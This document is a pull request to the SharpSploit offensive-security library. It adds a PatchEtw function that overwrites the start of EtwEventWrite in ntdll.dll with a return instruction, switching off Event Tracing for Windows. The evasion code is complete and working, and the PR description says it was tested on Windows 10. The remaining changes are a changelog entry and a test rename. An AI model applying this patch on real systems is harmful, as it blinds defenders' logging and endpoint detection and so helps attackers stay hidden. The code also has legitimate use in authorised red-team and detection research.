### PR TITLE
Add ETW (Event Tracing for Windows) bypass

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,7 +4,7 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
-## Unreleased
+## [v1.6] - 2020-06-08
 ### Added
 - Added ManualMapping functions (credit @b33f, @TheWover)
 - Added ModuleOverloading functions (credit @b33f)

--- a/SharpSploit.Tests/SharpSploit.Tests/Pivoting/ReversePortForwardingTests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Pivoting/ReversePortForwardingTests.cs
@@ -12,7 +12,7 @@ using SharpSploit.Pivoting;
 namespace SharpSploit.Tests.Pivoting
 {
     [TestClass]
-    public class RPortFwdTest
+    public class ReversePortForwardingTests
     {
         public const string testWebResponse = "this is a test";
 

--- a/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
+++ b/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
@@ -70,7 +70,7 @@
     <Compile Include="LateralMovement\SCMTests.cs" />
     <Compile Include="LateralMovement\WMITests.cs" />
     <Compile Include="Persistence\AutorunTests.cs" />
-    <Compile Include="Pivoting\RPortFwdTests.cs" />
+    <Compile Include="Pivoting\ReversePortForwardingTests.cs" />
     <Compile Include="Persistence\StartupTests.cs" />
     <Compile Include="Persistence\WMITests.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />

--- a/SharpSploit/Evasion/ETW.cs
+++ b/SharpSploit/Evasion/ETW.cs
@@ -47,6 +47,7 @@ namespace SharpSploit.Evasion
                 uint oldProtect;
                 PInvoke.Win32.Kernel32.VirtualProtect(address, (UIntPtr)patch.Length, 0x40, out oldProtect);
                 Marshal.Copy(patch, 0, address, patch.Length);
+				PInvoke.Win32.Kernel32.VirtualProtect(address, (UIntPtr)patch.Length, oldProtect, out oldProtect);
                 return true;
             }
             catch

--- a/SharpSploit/Evasion/ETW.cs
+++ b/SharpSploit/Evasion/ETW.cs
@@ -1,0 +1,57 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.Runtime.InteropServices;
+using SharpSploit.Misc;
+using PInvoke = SharpSploit.Execution.PlatformInvoke;
+
+namespace SharpSploit.Evasion
+{
+
+    /// <summary>
+    /// ETW is a class for manipulating the Event Tracing for Windows (ETW).
+    /// </summary>
+    public class ETW
+    {
+        /// <summary>
+        /// Patch the EtwEventWrite function in ntdll.dll.
+        /// </summary>
+        /// /// <returns>Bool. True if succeeded, otherwise false.</returns>
+        /// <remarks>
+        /// Code has been kindly stolen and adapted from Adam Chester (https://blog.xpnsec.com/hiding-your-dotnet-etw/) and Mythic (https://github.com/its-a-feature/Mythic).
+        /// </remarks>
+        public static bool PatchEtw()
+        {
+            byte[] patch;
+            if (Utilities.Is64Bit)
+            {
+                patch = new byte[2];
+                patch[0] = 0xc3;
+                patch[1] = 0x00;
+            }
+            else
+            {
+                patch = new byte[3];
+                patch[0] = 0xc2;
+                patch[1] = 0x14;
+                patch[2] = 0x00;
+            }
+
+            try
+            {
+                var library = PInvoke.Win32.Kernel32.LoadLibrary("ntdll.dll");
+                var address = PInvoke.Win32.Kernel32.GetProcAddress(library, "EtwEventWrite");
+                uint oldProtect;
+                PInvoke.Win32.Kernel32.VirtualProtect(address, (UIntPtr)patch.Length, 0x40, out oldProtect);
+                Marshal.Copy(patch, 0, address, patch.Length);
+                return true;
+            }
+            catch
+            {
+                return false;
+            }
+        }
+    }
+}

--- a/SharpSploit/Evasion/ETW.cs
+++ b/SharpSploit/Evasion/ETW.cs
@@ -21,7 +21,8 @@ namespace SharpSploit.Evasion
         /// /// <returns>Bool. True if succeeded, otherwise false.</returns>
         /// <remarks>
         /// Code has been kindly stolen and adapted from Adam Chester (https://blog.xpnsec.com/hiding-your-dotnet-etw/) and Mythic (https://github.com/its-a-feature/Mythic).
-        /// </remarks>
+        /// Authors: Simone Salucci & Daniel López @ NCC Group 
+        ///</remarks>
         public static bool PatchEtw()
         {
             byte[] patch;


### PR DESCRIPTION
Adds:
- `ETW` class in the `SharpSploit.Evasion` namespace
- `PatchEtw` function
	
Disable ETW by patching the `EtwEventWrite` function in `ntdll.dll`.

Code has been kindly stolen and adapted from Adam Chester (https://blog.xpnsec.com/hiding-your-dotnet-etw/) and Mythic (https://github.com/its-a-feature/Mythic).

Tested on Windows 10 1909 and .NET Framework 4.8